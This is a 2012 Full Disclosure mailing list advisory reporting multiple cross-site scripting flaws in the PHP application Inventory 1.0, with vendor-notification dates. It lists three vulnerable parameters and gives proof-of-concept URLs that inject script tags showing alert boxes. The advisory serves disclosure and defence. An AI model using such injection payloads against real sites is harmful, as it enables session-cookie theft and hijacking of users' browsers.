Full Disclosure mailing list archives
Inventory 1.0 Multiple XSS Vulnerabilities
From: Thomas Richards <g13net () gmail com>
Date: Fri, 26 Oct 2012 09:28:32 -0400
# Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities # Date: 10/19/12 # Author: G13 # Twitter: @g13net # Software Site: https://github.com/farevalod/inventory # Version: 1.0 # Category: webapp (php) # dc585 ##### ToC ##### 0x01 Description 0x02 XSS 0x03 Vendor Notification ##### 0x01 Description ##### PHP + SQL Inventory tracking system ##### 0x02 XSS ##### The Inventory application has multiple pages and parameters that are vulnerable to cross-site scripting. This vulnerabilities could be used to steal session cookies or take control of a client's browser. -----Vulnerable Pages----- http://localhost/inventory/consulta_fact.php?fact_num=[XSS] http://localhost/inventory/newinventario.php?sn=[XSS] http://localhost/inventory/newtransact.php?ref=[XSS] -----PoC Exploit----- http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script> http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script> http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script> ##### 0x03 Vendor Notification ##### 10/19/12 - Vendor Notified 10/26/12 - No response, disclosure _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Inventory 1.0 Multiple XSS Vulnerabilities Thomas Richards (Oct 26)